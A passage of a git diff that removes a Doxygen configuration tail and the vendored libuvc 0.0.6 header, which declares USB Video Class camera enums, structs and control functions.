-#
-# Note that enabling this option will significantly increase the time of a run.
-# So in most cases it will be better to enable call graphs for selected
-# functions only using the \callgraph command.
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-CALL_GRAPH             = NO
-
-# If the CALLER_GRAPH tag is set to YES then doxygen will generate a caller
-# dependency graph for every global function or class method.
-#
-# Note that enabling this option will significantly increase the time of a run.
-# So in most cases it will be better to enable caller graphs for selected
-# functions only using the \callergraph command.
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-CALLER_GRAPH           = NO
-
-# If the GRAPHICAL_HIERARCHY tag is set to YES then doxygen will graphical
-# hierarchy of all classes instead of a textual one.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-GRAPHICAL_HIERARCHY    = YES
-
-# If the DIRECTORY_GRAPH tag is set to YES then doxygen will show the
-# dependencies a directory has on other directories in a graphical way. The
-# dependency relations are determined by the #include relations between the
-# files in the directories.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DIRECTORY_GRAPH        = YES
-
-# The DOT_IMAGE_FORMAT tag can be used to set the image format of the images
-# generated by dot.
-# Note: If you choose svg you need to set HTML_FILE_EXTENSION to xhtml in order
-# to make the SVG files visible in IE 9+ (other browsers do not have this
-# requirement).
-# Possible values are: png, jpg, gif and svg.
-# The default value is: png.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_IMAGE_FORMAT       = png
-
-# If DOT_IMAGE_FORMAT is set to svg, then this option can be set to YES to
-# enable generation of interactive SVG images that allow zooming and panning.
-#
-# Note that this requires a modern browser other than Internet Explorer. Tested
-# and working are Firefox, Chrome, Safari, and Opera.
-# Note: For IE 9+ you need to set HTML_FILE_EXTENSION to xhtml in order to make
-# the SVG files visible. Older versions of IE do not have SVG support.
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-INTERACTIVE_SVG        = NO
-
-# The DOT_PATH tag can be used to specify the path where the dot tool can be
-# found. If left blank, it is assumed the dot tool can be found in the path.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_PATH               =
-
-# The DOTFILE_DIRS tag can be used to specify one or more directories that
-# contain dot files that are included in the documentation (see the \dotfile
-# command).
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOTFILE_DIRS           =
-
-# The MSCFILE_DIRS tag can be used to specify one or more directories that
-# contain msc files that are included in the documentation (see the \mscfile
-# command).
-
-MSCFILE_DIRS           =
-
-# The DOT_GRAPH_MAX_NODES tag can be used to set the maximum number of nodes
-# that will be shown in the graph. If the number of nodes in a graph becomes
-# larger than this value, doxygen will truncate the graph, which is visualized
-# by representing a node as a red box. Note that doxygen if the number of direct
-# children of the root node in a graph is already larger than
-# DOT_GRAPH_MAX_NODES then the graph will not be shown at all. Also note that
-# the size of a graph can be further restricted by MAX_DOT_GRAPH_DEPTH.
-# Minimum value: 0, maximum value: 10000, default value: 50.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_GRAPH_MAX_NODES    = 50
-
-# The MAX_DOT_GRAPH_DEPTH tag can be used to set the maximum depth of the graphs
-# generated by dot. A depth value of 3 means that only nodes reachable from the
-# root by following a path via at most 3 edges will be shown. Nodes that lay
-# further from the root node will be omitted. Note that setting this option to 1
-# or 2 may greatly reduce the computation time needed for large code bases. Also
-# note that the size of a graph can be further restricted by
-# DOT_GRAPH_MAX_NODES. Using a depth of 0 means no depth restriction.
-# Minimum value: 0, maximum value: 1000, default value: 0.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-MAX_DOT_GRAPH_DEPTH    = 0
-
-# Set the DOT_TRANSPARENT tag to YES to generate images with a transparent
-# background. This is disabled by default, because dot on Windows does not seem
-# to support this out of the box.
-#
-# Warning: Depending on the platform used, enabling this option may lead to
-# badly anti-aliased labels on the edges of a graph (i.e. they become hard to
-# read).
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_TRANSPARENT        = NO
-
-# Set the DOT_MULTI_TARGETS tag to YES allow dot to generate multiple output
-# files in one run (i.e. multiple -o and -T options on the command line). This
-# makes dot run faster, but since only newer versions of dot (>1.8.10) support
-# this, this feature is disabled by default.
-# The default value is: NO.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_MULTI_TARGETS      = NO
-
-# If the GENERATE_LEGEND tag is set to YES doxygen will generate a legend page
-# explaining the meaning of the various boxes and arrows in the dot generated
-# graphs.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-GENERATE_LEGEND        = YES
-
-# If the DOT_CLEANUP tag is set to YES doxygen will remove the intermediate dot
-# files that are used to generate the various graphs.
-# The default value is: YES.
-# This tag requires that the tag HAVE_DOT is set to YES.
-
-DOT_CLEANUP            = YES
diff --git a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc.h b/thirdparty/libuvc-0.0.6/include/libuvc/libuvc.h
deleted file mode 100644
index fa0aea0..0000000
--- a/thirdparty/libuvc-0.0.6/include/libuvc/libuvc.h
+++ /dev/null
@@ -1,741 +0,0 @@
-#ifndef LIBUVC_H
-#define LIBUVC_H
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-#include <stdio.h> // FILE
-#include <stdint.h>
-#include <sys/time.h>
-#include <libuvc/libuvc_config.h>
-
-struct libusb_context;
-struct libusb_device_handle;
-
-/** UVC error types, based on libusb errors
- * @ingroup diag
- */
-typedef enum uvc_error {
-  /** Success (no error) */
-  UVC_SUCCESS = 0,
-  /** Input/output error */
-  UVC_ERROR_IO = -1,
-  /** Invalid parameter */
-  UVC_ERROR_INVALID_PARAM = -2,
-  /** Access denied */
-  UVC_ERROR_ACCESS = -3,
-  /** No such device */
-  UVC_ERROR_NO_DEVICE = -4,
-  /** Entity not found */
-  UVC_ERROR_NOT_FOUND = -5,
-  /** Resource busy */
-  UVC_ERROR_BUSY = -6,
-  /** Operation timed out */
-  UVC_ERROR_TIMEOUT = -7,
-  /** Overflow */
-  UVC_ERROR_OVERFLOW = -8,
-  /** Pipe error */
-  UVC_ERROR_PIPE = -9,
-  /** System call interrupted */
-  UVC_ERROR_INTERRUPTED = -10,
-  /** Insufficient memory */
-  UVC_ERROR_NO_MEM = -11,
-  /** Operation not supported */
-  UVC_ERROR_NOT_SUPPORTED = -12,
-  /** Device is not UVC-compliant */
-  UVC_ERROR_INVALID_DEVICE = -50,
-  /** Mode not supported */
-  UVC_ERROR_INVALID_MODE = -51,
-  /** Resource has a callback (can't use polling and async) */
-  UVC_ERROR_CALLBACK_EXISTS = -52,
-  /** Undefined error */
-  UVC_ERROR_OTHER = -99
-} uvc_error_t;
-
-/** Color coding of stream, transport-independent
- * @ingroup streaming
- */
-enum uvc_frame_format {
-  UVC_FRAME_FORMAT_UNKNOWN = 0,
-  /** Any supported format */
-  UVC_FRAME_FORMAT_ANY = 0,
-  UVC_FRAME_FORMAT_UNCOMPRESSED,
-  UVC_FRAME_FORMAT_COMPRESSED,
-  /** YUYV/YUV2/YUV422: YUV encoding with one luminance value per pixel and
-   * one UV (chrominance) pair for every two pixels.
-   */
-  UVC_FRAME_FORMAT_YUYV,
-  UVC_FRAME_FORMAT_UYVY,
-  /** 24-bit RGB */
-  UVC_FRAME_FORMAT_RGB,
-  UVC_FRAME_FORMAT_BGR,
-  /** Motion-JPEG (or JPEG) encoded images */
-  UVC_FRAME_FORMAT_MJPEG,
-  /** Greyscale images */
-  UVC_FRAME_FORMAT_GRAY8,
-  UVC_FRAME_FORMAT_GRAY16,
-  /* Raw colour mosaic images */
-  UVC_FRAME_FORMAT_BY8,
-  UVC_FRAME_FORMAT_BA81,
-  UVC_FRAME_FORMAT_SGRBG8,
-  UVC_FRAME_FORMAT_SGBRG8,
-  UVC_FRAME_FORMAT_SRGGB8,
-  UVC_FRAME_FORMAT_SBGGR8,
-  /** Number of formats understood */
-  UVC_FRAME_FORMAT_COUNT,
-};
-
-/* UVC_COLOR_FORMAT_* have been replaced with UVC_FRAME_FORMAT_*. Please use
- * UVC_FRAME_FORMAT_* instead of using these. */
-#define UVC_COLOR_FORMAT_UNKNOWN UVC_FRAME_FORMAT_UNKNOWN
-#define UVC_COLOR_FORMAT_UNCOMPRESSED UVC_FRAME_FORMAT_UNCOMPRESSED
-#define UVC_COLOR_FORMAT_COMPRESSED UVC_FRAME_FORMAT_COMPRESSED
-#define UVC_COLOR_FORMAT_YUYV UVC_FRAME_FORMAT_YUYV
-#define UVC_COLOR_FORMAT_UYVY UVC_FRAME_FORMAT_UYVY
-#define UVC_COLOR_FORMAT_RGB UVC_FRAME_FORMAT_RGB
-#define UVC_COLOR_FORMAT_BGR UVC_FRAME_FORMAT_BGR
-#define UVC_COLOR_FORMAT_MJPEG UVC_FRAME_FORMAT_MJPEG
-#define UVC_COLOR_FORMAT_GRAY8 UVC_FRAME_FORMAT_GRAY8
-#define UVC_COLOR_FORMAT_GRAY16 UVC_FRAME_FORMAT_GRAY16
-
-/** VideoStreaming interface descriptor subtype (A.6) */
-enum uvc_vs_desc_subtype {
-  UVC_VS_UNDEFINED = 0x00,
-  UVC_VS_INPUT_HEADER = 0x01,
-  UVC_VS_OUTPUT_HEADER = 0x02,
-  UVC_VS_STILL_IMAGE_FRAME = 0x03,
-  UVC_VS_FORMAT_UNCOMPRESSED = 0x04,
-  UVC_VS_FRAME_UNCOMPRESSED = 0x05,
-  UVC_VS_FORMAT_MJPEG = 0x06,
-  UVC_VS_FRAME_MJPEG = 0x07,
-  UVC_VS_FORMAT_MPEG2TS = 0x0a,
-  UVC_VS_FORMAT_DV = 0x0c,
-  UVC_VS_COLORFORMAT = 0x0d,
-  UVC_VS_FORMAT_FRAME_BASED = 0x10,
-  UVC_VS_FRAME_FRAME_BASED = 0x11,
-  UVC_VS_FORMAT_STREAM_BASED = 0x12
-};
-
-struct uvc_format_desc;
-struct uvc_frame_desc;
-
-/** Frame descriptor
- *
- * A "frame" is a configuration of a streaming format
- * for a particular image size at one of possibly several
- * available frame rates.
- */
-typedef struct uvc_frame_desc {
-  struct uvc_format_desc *parent;
-  struct uvc_frame_desc *prev, *next;
-  /** Type of frame, such as JPEG frame or uncompressed frme */
-  enum uvc_vs_desc_subtype bDescriptorSubtype;
-  /** Index of the frame within the list of specs available for this format */
-  uint8_t bFrameIndex;
-  uint8_t bmCapabilities;
-  /** Image width */
-  uint16_t wWidth;
-  /** Image height */
-  uint16_t wHeight;
-  /** Bitrate of corresponding stream at minimal frame rate */
-  uint32_t dwMinBitRate;
-  /** Bitrate of corresponding stream at maximal frame rate */
-  uint32_t dwMaxBitRate;
-  /** Maximum number of bytes for a video frame */
-  uint32_t dwMaxVideoFrameBufferSize;
-  /** Default frame interval (in 100ns units) */
-  uint32_t dwDefaultFrameInterval;
-  /** Minimum frame interval for continuous mode (100ns units) */
-  uint32_t dwMinFrameInterval;
-  /** Maximum frame interval for continuous mode (100ns units) */
-  uint32_t dwMaxFrameInterval;
-  /** Granularity of frame interval range for continuous mode (100ns) */
-  uint32_t dwFrameIntervalStep;
-  /** Frame intervals */
-  uint8_t bFrameIntervalType;
-  /** number of bytes per line */
-  uint32_t dwBytesPerLine;
-  /** Available frame rates, zero-terminated (in 100ns units) */
-  uint32_t *intervals;
-} uvc_frame_desc_t;
-
-/** Format descriptor
- *
- * A "format" determines a stream's image type (e.g., raw YUYV or JPEG)
- * and includes many "frame" configurations.
- */
-typedef struct uvc_format_desc {
-  struct uvc_streaming_interface *parent;
-  struct uvc_format_desc *prev, *next;
-  /** Type of image stream, such as JPEG or uncompressed. */
-  enum uvc_vs_desc_subtype bDescriptorSubtype;
-  /** Identifier of this format within the VS interface's format list */
-  uint8_t bFormatIndex;
-  uint8_t bNumFrameDescriptors;
-  /** Format specifier */
-  union {
-    uint8_t guidFormat[16];
-    uint8_t fourccFormat[4];
-  };
-  /** Format-specific data */
-  union {
-    /** BPP for uncompressed stream */
-    uint8_t bBitsPerPixel;
-    /** Flags for JPEG stream */
-    uint8_t bmFlags;
-  };
-  /** Default {uvc_frame_desc} to choose given this format */
-  uint8_t bDefaultFrameIndex;
-  uint8_t bAspectRatioX;
-  uint8_t bAspectRatioY;
-  uint8_t bmInterlaceFlags;
-  uint8_t bCopyProtect;
-  uint8_t bVariableSize;
-  /** Available frame specifications for this format */
-  struct uvc_frame_desc *frame_descs;
-} uvc_format_desc_t;
-
-/** UVC request code (A.8) */
-enum uvc_req_code {
-  UVC_RC_UNDEFINED = 0x00,
-  UVC_SET_CUR = 0x01,
-  UVC_GET_CUR = 0x81,
-  UVC_GET_MIN = 0x82,
-  UVC_GET_MAX = 0x83,
-  UVC_GET_RES = 0x84,
-  UVC_GET_LEN = 0x85,
-  UVC_GET_INFO = 0x86,
-  UVC_GET_DEF = 0x87
-};
-
-enum uvc_device_power_mode {
-  UVC_VC_VIDEO_POWER_MODE_FULL = 0x000b,
-  UVC_VC_VIDEO_POWER_MODE_DEVICE_DEPENDENT = 0x001b,
-};
-
-/** Camera terminal control selector (A.9.4) */
-enum uvc_ct_ctrl_selector {
-  UVC_CT_CONTROL_UNDEFINED = 0x00,
-  UVC_CT_SCANNING_MODE_CONTROL = 0x01,
-  UVC_CT_AE_MODE_CONTROL = 0x02,
-  UVC_CT_AE_PRIORITY_CONTROL = 0x03,
-  UVC_CT_EXPOSURE_TIME_ABSOLUTE_CONTROL = 0x04,
-  UVC_CT_EXPOSURE_TIME_RELATIVE_CONTROL = 0x05,
-  UVC_CT_FOCUS_ABSOLUTE_CONTROL = 0x06,
-  UVC_CT_FOCUS_RELATIVE_CONTROL = 0x07,
-  UVC_CT_FOCUS_AUTO_CONTROL = 0x08,
-  UVC_CT_IRIS_ABSOLUTE_CONTROL = 0x09,
-  UVC_CT_IRIS_RELATIVE_CONTROL = 0x0a,
-  UVC_CT_ZOOM_ABSOLUTE_CONTROL = 0x0b,
-  UVC_CT_ZOOM_RELATIVE_CONTROL = 0x0c,
-  UVC_CT_PANTILT_ABSOLUTE_CONTROL = 0x0d,
-  UVC_CT_PANTILT_RELATIVE_CONTROL = 0x0e,
-  UVC_CT_ROLL_ABSOLUTE_CONTROL = 0x0f,
-  UVC_CT_ROLL_RELATIVE_CONTROL = 0x10,
-  UVC_CT_PRIVACY_CONTROL = 0x11,
-  UVC_CT_FOCUS_SIMPLE_CONTROL = 0x12,
-  UVC_CT_DIGITAL_WINDOW_CONTROL = 0x13,
-  UVC_CT_REGION_OF_INTEREST_CONTROL = 0x14
-};
-
-/** Processing unit control selector (A.9.5) */
-enum uvc_pu_ctrl_selector {
-  UVC_PU_CONTROL_UNDEFINED = 0x00,
-  UVC_PU_BACKLIGHT_COMPENSATION_CONTROL = 0x01,
-  UVC_PU_BRIGHTNESS_CONTROL = 0x02,
-  UVC_PU_CONTRAST_CONTROL = 0x03,
-  UVC_PU_GAIN_CONTROL = 0x04,
-  UVC_PU_POWER_LINE_FREQUENCY_CONTROL = 0x05,
-  UVC_PU_HUE_CONTROL = 0x06,
-  UVC_PU_SATURATION_CONTROL = 0x07,
-  UVC_PU_SHARPNESS_CONTROL = 0x08,
-  UVC_PU_GAMMA_CONTROL = 0x09,
-  UVC_PU_WHITE_BALANCE_TEMPERATURE_CONTROL = 0x0a,
-  UVC_PU_WHITE_BALANCE_TEMPERATURE_AUTO_CONTROL = 0x0b,
-  UVC_PU_WHITE_BALANCE_COMPONENT_CONTROL = 0x0c,
-  UVC_PU_WHITE_BALANCE_COMPONENT_AUTO_CONTROL = 0x0d,
-  UVC_PU_DIGITAL_MULTIPLIER_CONTROL = 0x0e,
-  UVC_PU_DIGITAL_MULTIPLIER_LIMIT_CONTROL = 0x0f,
-  UVC_PU_HUE_AUTO_CONTROL = 0x10,
-  UVC_PU_ANALOG_VIDEO_STANDARD_CONTROL = 0x11,
-  UVC_PU_ANALOG_LOCK_STATUS_CONTROL = 0x12,
-  UVC_PU_CONTRAST_AUTO_CONTROL = 0x13
-};
-
-/** USB terminal type (B.1) */
-enum uvc_term_type {
-  UVC_TT_VENDOR_SPECIFIC = 0x0100,
-  UVC_TT_STREAMING = 0x0101
-};
-
-/** Input terminal type (B.2) */
-enum uvc_it_type {
-  UVC_ITT_VENDOR_SPECIFIC = 0x0200,
-  UVC_ITT_CAMERA = 0x0201,
-  UVC_ITT_MEDIA_TRANSPORT_INPUT = 0x0202
-};
-
-/** Output terminal type (B.3) */
-enum uvc_ot_type {
-  UVC_OTT_VENDOR_SPECIFIC = 0x0300,
-  UVC_OTT_DISPLAY = 0x0301,
-  UVC_OTT_MEDIA_TRANSPORT_OUTPUT = 0x0302
-};
-
-/** External terminal type (B.4) */
-enum uvc_et_type {
-  UVC_EXTERNAL_VENDOR_SPECIFIC = 0x0400,
-  UVC_COMPOSITE_CONNECTOR = 0x0401,
-  UVC_SVIDEO_CONNECTOR = 0x0402,
-  UVC_COMPONENT_CONNECTOR = 0x0403
-};
-
-/** Context, equivalent to libusb's contexts.
- *
- * May either own a libusb context or use one that's already made.
- *
- * Always create these with uvc_get_context.
- */
-struct uvc_context;
-typedef struct uvc_context uvc_context_t;
-
-/** UVC device.
- *
- * Get this from uvc_get_device_list() or uvc_find_device().
- */
-struct uvc_device;
-typedef struct uvc_device uvc_device_t;
-
-/** Handle on an open UVC device.
- *
- * Get one of these from uvc_open(). Once you uvc_close()
- * it, it's no longer valid.
- */
-struct uvc_device_handle;
-typedef struct uvc_device_handle uvc_device_handle_t;
-
-/** Handle on an open UVC stream.
- *
- * Get one of these from uvc_stream_open*().
- * Once you uvc_stream_close() it, it will no longer be valid.
- */
-struct uvc_stream_handle;
-typedef struct uvc_stream_handle uvc_stream_handle_t;
-
-/** Representation of the interface that brings data into the UVC device */
-typedef struct uvc_input_terminal {
-  struct uvc_input_terminal *prev, *next;
-  /** Index of the terminal within the device */
-  uint8_t bTerminalID;
-  /** Type of terminal (e.g., camera) */
-  enum uvc_it_type wTerminalType;
-  uint16_t wObjectiveFocalLengthMin;
-  uint16_t wObjectiveFocalLengthMax;
-  uint16_t wOcularFocalLength;
-  /** Camera controls (meaning of bits given in {uvc_ct_ctrl_selector}) */
-  uint64_t bmControls;
-} uvc_input_terminal_t;
-
-typedef struct uvc_output_terminal {
-  struct uvc_output_terminal *prev, *next;
-  /** @todo */
-} uvc_output_terminal_t;
-
-/** Represents post-capture processing functions */
-typedef struct uvc_processing_unit {
-  struct uvc_processing_unit *prev, *next;
-  /** Index of the processing unit within the device */
-  uint8_t bUnitID;
-  /** Index of the terminal from which the device accepts images */
-  uint8_t bSourceID;
-  /** Processing controls (meaning of bits given in {uvc_pu_ctrl_selector}) */
-  uint64_t bmControls;
-} uvc_processing_unit_t;
-
-/** Represents selector unit to connect other units */
-typedef struct uvc_selector_unit {
-  struct uvc_selector_unit *prev, *next;
-  /** Index of the selector unit within the device */
-  uint8_t bUnitID;
-} uvc_selector_unit_t;
-
-/** Custom processing or camera-control functions */
-typedef struct uvc_extension_unit {
-  struct uvc_extension_unit *prev, *next;
-  /** Index of the extension unit within the device */
-  uint8_t bUnitID;
-  /** GUID identifying the extension unit */
-  uint8_t guidExtensionCode[16];
-  /** Bitmap of available controls (manufacturer-dependent) */
-  uint64_t bmControls;
-} uvc_extension_unit_t;
-
-enum uvc_status_class {
-  UVC_STATUS_CLASS_CONTROL = 0x10,
-  UVC_STATUS_CLASS_CONTROL_CAMERA = 0x11,
-  UVC_STATUS_CLASS_CONTROL_PROCESSING = 0x12,
-};
-
-enum uvc_status_attribute {
-  UVC_STATUS_ATTRIBUTE_VALUE_CHANGE = 0x00,
-  UVC_STATUS_ATTRIBUTE_INFO_CHANGE = 0x01,
-  UVC_STATUS_ATTRIBUTE_FAILURE_CHANGE = 0x02,
-  UVC_STATUS_ATTRIBUTE_UNKNOWN = 0xff
-};
-
-/** A callback function to accept status updates
- * @ingroup device
- */
-typedef void(uvc_status_callback_t)(enum uvc_status_class status_class,
-                                    int event,
-                                    int selector,
-                                    enum uvc_status_attribute status_attribute,
-                                    void *data, size_t data_len,
-                                    void *user_ptr);
-
-/** A callback function to accept button events
- * @ingroup device
- */
-typedef void(uvc_button_callback_t)(int button,
-                                    int state,
-                                    void *user_ptr);
-
-/** Structure representing a UVC device descriptor.
- *
- * (This isn't a standard structure.)
- */
-typedef struct uvc_device_descriptor {
-  /** Vendor ID */
-  uint16_t idVendor;
-  /** Product ID */
-  uint16_t idProduct;
-  /** UVC compliance level, e.g. 0x0100 (1.0), 0x0110 */
-  uint16_t bcdUVC;
-  /** Serial number (null if unavailable) */
-  const char *serialNumber;
-  /** Device-reported manufacturer name (or null) */
-  const char *manufacturer;
-  /** Device-reporter product name (or null) */
-  const char *product;
-} uvc_device_descriptor_t;
-
-/** An image frame received from the UVC device
- * @ingroup streaming
- */
-typedef struct uvc_frame {
-  /** Image data for this frame */
-  void *data;
-  /** Size of image data buffer */
-  size_t data_bytes;
-  /** Width of image in pixels */
-  uint32_t width;
-  /** Height of image in pixels */
-  uint32_t height;
-  /** Pixel data format */
-  enum uvc_frame_format frame_format;
-  /** Number of bytes per horizontal line (undefined for compressed format) */
-  size_t step;
-  /** Frame number (may skip, but is strictly monotonically increasing) */
-  uint32_t sequence;
-  /** Estimate of system time when the device started capturing the image */
-  struct timeval capture_time;
-  /** Handle on the device that produced the image.
-   * @warning You must not call any uvc_* functions during a callback. */
-  uvc_device_handle_t *source;
-  /** Is the data buffer owned by the library?
-   * If 1, the data buffer can be arbitrarily reallocated by frame conversion
-   * functions.
-   * If 0, the data buffer will not be reallocated or freed by the library.
-   * Set this field to zero if you are supplying the buffer.
-   */
-  uint8_t library_owns_data;
-} uvc_frame_t;
-
-/** A callback function to handle incoming assembled UVC frames
- * @ingroup streaming
- */
-typedef void(uvc_frame_callback_t)(struct uvc_frame *frame, void *user_ptr);
-
-/** Streaming mode, includes all information needed to select stream
- * @ingroup streaming
- */
-typedef struct uvc_stream_ctrl {
-  uint16_t bmHint;
-  uint8_t bFormatIndex;
-  uint8_t bFrameIndex;
-  uint32_t dwFrameInterval;
-  uint16_t wKeyFrameRate;
-  uint16_t wPFrameRate;
-  uint16_t wCompQuality;
-  uint16_t wCompWindowSize;
-  uint16_t wDelay;
-  uint32_t dwMaxVideoFrameSize;
-  uint32_t dwMaxPayloadTransferSize;
-  uint32_t dwClockFrequency;
-  uint8_t bmFramingInfo;
-  uint8_t bPreferredVersion;
-  uint8_t bMinVersion;
-  uint8_t bMaxVersion;
-  uint8_t bInterfaceNumber;
-} uvc_stream_ctrl_t;
-
-uvc_error_t uvc_init(uvc_context_t **ctx, struct libusb_context *usb_ctx);
-void uvc_exit(uvc_context_t *ctx);
-
-uvc_error_t uvc_get_device_list(
-    uvc_context_t *ctx,
-    uvc_device_t ***list);
-void uvc_free_device_list(uvc_device_t **list, uint8_t unref_devices);
-
-uvc_error_t uvc_get_device_descriptor(
-    uvc_device_t *dev,
-    uvc_device_descriptor_t **desc);
-void uvc_free_device_descriptor(
-    uvc_device_descriptor_t *desc);
-
-uint8_t uvc_get_bus_number(uvc_device_t *dev);
-uint8_t uvc_get_device_address(uvc_device_t *dev);
-
-uvc_error_t uvc_find_device(
-    uvc_context_t *ctx,
-    uvc_device_t **dev,
-    int vid, int pid, const char *sn);
-
-uvc_error_t uvc_find_devices(
-    uvc_context_t *ctx,
-    uvc_device_t ***devs,
-    int vid, int pid, const char *sn);
-
-uvc_error_t uvc_open(
-    uvc_device_t *dev,
-    uvc_device_handle_t **devh);
-void uvc_close(uvc_device_handle_t *devh);
-
-uvc_device_t *uvc_get_device(uvc_device_handle_t *devh);
-struct libusb_device_handle *uvc_get_libusb_handle(uvc_device_handle_t *devh);
-
-void uvc_ref_device(uvc_device_t *dev);
-void uvc_unref_device(uvc_device_t *dev);
-
-void uvc_set_status_callback(uvc_device_handle_t *devh,
-                             uvc_status_callback_t cb,
-                             void *user_ptr);
-
-void uvc_set_button_callback(uvc_device_handle_t *devh,
-                             uvc_button_callback_t cb,
-                             void *user_ptr);
-
-const uvc_input_terminal_t *uvc_get_camera_terminal(uvc_device_handle_t *devh);
-const uvc_input_terminal_t *uvc_get_input_terminals(uvc_device_handle_t *devh);
-const uvc_output_terminal_t *uvc_get_output_terminals(uvc_device_handle_t *devh);
-const uvc_selector_unit_t *uvc_get_selector_units(uvc_device_handle_t *devh);
-const uvc_processing_unit_t *uvc_get_processing_units(uvc_device_handle_t *devh);
-const uvc_extension_unit_t *uvc_get_extension_units(uvc_device_handle_t *devh);
-
-uvc_error_t uvc_get_stream_ctrl_format_size(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    enum uvc_frame_format format,
-    int width, int height,
-    int fps
-    );
-
-const uvc_format_desc_t *uvc_get_format_descs(uvc_device_handle_t* );
-
-uvc_error_t uvc_probe_stream_ctrl(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl);
-
-uvc_error_t uvc_start_streaming(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    uvc_frame_callback_t *cb,
-    void *user_ptr,
-    uint8_t flags);
-
-uvc_error_t uvc_start_iso_streaming(
-    uvc_device_handle_t *devh,
-    uvc_stream_ctrl_t *ctrl,
-    uvc_frame_callback_t *cb,
-    void *user_ptr);
-
-void uvc_stop_streaming(uvc_device_handle_t *devh);
-
-uvc_error_t uvc_stream_open_ctrl(uvc_device_handle_t *devh, uvc_stream_handle_t **strmh, uvc_stream_ctrl_t *ctrl);
-uvc_error_t uvc_stream_ctrl(uvc_stream_handle_t *strmh, uvc_stream_ctrl_t *ctrl);
-uvc_error_t uvc_stream_start(uvc_stream_handle_t *strmh,
-    uvc_frame_callback_t *cb,
-    void *user_ptr,
-    uint8_t flags);
-uvc_error_t uvc_stream_start_iso(uvc_stream_handle_t *strmh,
-    uvc_frame_callback_t *cb,
-    void *user_ptr);
-uvc_error_t uvc_stream_get_frame(
-    uvc_stream_handle_t *strmh,
-    uvc_frame_t **frame,
-    int32_t timeout_us
-);
-uvc_error_t uvc_stream_stop(uvc_stream_handle_t *strmh);
-void uvc_stream_close(uvc_stream_handle_t *strmh);
-
-int uvc_get_ctrl_len(uvc_device_handle_t *devh, uint8_t unit, uint8_t ctrl);
-int uvc_get_ctrl(uvc_device_handle_t *devh, uint8_t unit, uint8_t ctrl, void *data, int len, enum uvc_req_code req_code);
-int uvc_set_ctrl(uvc_device_handle_t *devh, uint8_t unit, uint8_t ctrl, void *data, int len);
-
-uvc_error_t uvc_get_power_mode(uvc_device_handle_t *devh, enum uvc_device_power_mode *mode, enum uvc_req_code req_code);
-uvc_error_t uvc_set_power_mode(uvc_device_handle_t *devh, enum uvc_device_power_mode mode);
-
-/* AUTO-GENERATED control accessors! Update them with the output of `ctrl-gen.py decl`. */
-uvc_error_t uvc_get_scanning_mode(uvc_device_handle_t *devh, uint8_t* mode, enum uvc_req_code req_code);
-uvc_error_t uvc_set_scanning_mode(uvc_device_handle_t *devh, uint8_t mode);
-
-uvc_error_t uvc_get_ae_mode(uvc_device_handle_t *devh, uint8_t* mode, enum uvc_req_code req_code);
-uvc_error_t uvc_set_ae_mode(uvc_device_handle_t *devh, uint8_t mode);
-
-uvc_error_t uvc_get_ae_priority(uvc_device_handle_t *devh, uint8_t* priority, enum uvc_req_code req_code);
-uvc_error_t uvc_set_ae_priority(uvc_device_handle_t *devh, uint8_t priority);
-
-uvc_error_t uvc_get_exposure_abs(uvc_device_handle_t *devh, uint32_t* time, enum uvc_req_code req_code);
-uvc_error_t uvc_set_exposure_abs(uvc_device_handle_t *devh, uint32_t time);
-
-uvc_error_t uvc_get_exposure_rel(uvc_device_handle_t *devh, int8_t* step, enum uvc_req_code req_code);
-uvc_error_t uvc_set_exposure_rel(uvc_device_handle_t *devh, int8_t step);
-
-uvc_error_t uvc_get_focus_abs(uvc_device_handle_t *devh, uint16_t* focus, enum uvc_req_code req_code);
-uvc_error_t uvc_set_focus_abs(uvc_device_handle_t *devh, uint16_t focus);
-
-uvc_error_t uvc_get_focus_rel(uvc_device_handle_t *devh, int8_t* focus_rel, uint8_t* speed, enum uvc_req_code req_code);
-uvc_error_t uvc_set_focus_rel(uvc_device_handle_t *devh, int8_t focus_rel, uint8_t speed);
-
-uvc_error_t uvc_get_focus_simple_range(uvc_device_handle_t *devh, uint8_t* focus, enum uvc_req_code req_code);
-uvc_error_t uvc_set_focus_simple_range(uvc_device_handle_t *devh, uint8_t focus);
-
-uvc_error_t uvc_get_focus_auto(uvc_device_handle_t *devh, uint8_t* state, enum uvc_req_code req_code);
-uvc_error_t uvc_set_focus_auto(uvc_device_handle_t *devh, uint8_t state);
-
-uvc_error_t uvc_get_iris_abs(uvc_device_handle_t *devh, uint16_t* iris, enum uvc_req_code req_code);
-uvc_error_t uvc_set_iris_abs(uvc_device_handle_t *devh, uint16_t iris);
-
-uvc_error_t uvc_get_iris_rel(uvc_device_handle_t *devh, uint8_t* iris_rel, enum uvc_req_code req_code);
-uvc_error_t uvc_set_iris_rel(uvc_device_handle_t *devh, uint8_t iris_rel);
-
-uvc_error_t uvc_get_zoom_abs(uvc_device_handle_t *devh, uint16_t* focal_length, enum uvc_req_code req_code);
-uvc_error_t uvc_set_zoom_abs(uvc_device_handle_t *devh, uint16_t focal_length);
-
-uvc_error_t uvc_get_zoom_rel(uvc_device_handle_t *devh, int8_t* zoom_rel, uint8_t* digital_zoom, uint8_t* speed, enum uvc_req_code req_code);
-uvc_error_t uvc_set_zoom_rel(uvc_device_handle_t *devh, int8_t zoom_rel, uint8_t digital_zoom, uint8_t speed);
-
-uvc_error_t uvc_get_pantilt_abs(uvc_device_handle_t *devh, int32_t* pan, int32_t* tilt, enum uvc_req_code req_code);
